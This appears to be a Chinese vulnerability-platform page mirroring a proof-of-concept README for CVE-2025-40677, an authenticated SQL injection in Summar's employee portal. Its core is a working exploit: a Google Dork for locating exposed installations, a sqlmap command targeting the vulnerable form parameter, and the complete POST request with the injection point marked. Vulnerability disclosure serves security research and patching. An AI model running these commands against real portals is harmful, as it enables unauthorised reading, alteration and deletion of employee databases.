漏洞平台

POC详情： 191d96c77efe9c88c96852e58118d9dc93615997

来源

https://github.com/PeterGabaldon/CVE-2025-40677

关联漏洞

标题： Summar Portal del Empleado SQL注入漏洞 (CVE-2025-40677)
描述：Summar Portal del Empleado是西班牙Summar公司的一个员工门户系统。 Summar Portal del Empleado存在SQL注入漏洞，该漏洞源于对文件/MemberPages/quienesquien.aspx中参数ctl00$ContentPlaceHolder1$filtroNombre的错误操作，可能导致SQL注入攻击。

描述

Summar Employee Portal Prior to 3.98.0 Authenticated SQL Injection - CVE-2025-40677

介绍

# Exploit Title: Summar Employee Portal Prior to 3.98.0 Authenticated SQL Injection - CVE-2025-40677
# Google Dork: inurl:"/MemberPages/quienesquien.aspx"
# Date: 09/22/2025
# Exploit Author: Peter Gabaldon - https://pgj11.com/
# Vendor Homepage: https://www.summar.es/
# Software Link: https://www.summar.es/software-recursos-humanos/
# Version: < 3.98.0
# Tested on: Kali
# CVE : CVE-2025-40677
# Description: SQL injection vulnerability in Summar Software´s Portal del Empleado. This vulnerability allows an attacker to retrieve, create, update, and delete the database by sending a POST request using the parameter “ctl00$ContentPlaceHolder1$filtroNombre” in “/MemberPages/quienesquien.aspx”.

```
$ sqlmap --random-agent -r req.sqli.xml -p 'ctl00%24ContentPlaceHolder1%24filtroNombre' --dbms="MSSQL"

POST /MemberPages/quienesquien.aspx HTTP/1.1
Host: [REDACTED]
Cookie: [REDACTED]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
X-Microsoftajax: Delta=true
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: keep-alive
 
ctl00%24ScriptManager1=ctl00%24ScriptManager1%7Cctl00%24ContentPlaceHolder1%24lnkVerTrabajador&ctl00%24ContentPlaceHolder1%24filtroNombre=[SQL_INJECTION_POINT]&ctl00%24ContentPlaceHolder1%24ddlEmpresa=&ctl00%24ContentPlaceHolder1%24filtroCentro=&ctl00%24ContentPlaceHolder1%24filtroUO=&ctl00%24ContentPlaceHolder1%24filtroPuesto=&__EVENTTARGET=ctl00%24ContentPlaceHolder1%24lnkVerTrabajador&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=...&__VIEWSTATEGENERATOR=...&__ASYNCPOST=true&
```

文件快照


 [4.0K]  /data/pocs/191d96c77efe9c88c96852e58118d9dc93615997
└── [1.8K]  README.md

0 directories, 1 file

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。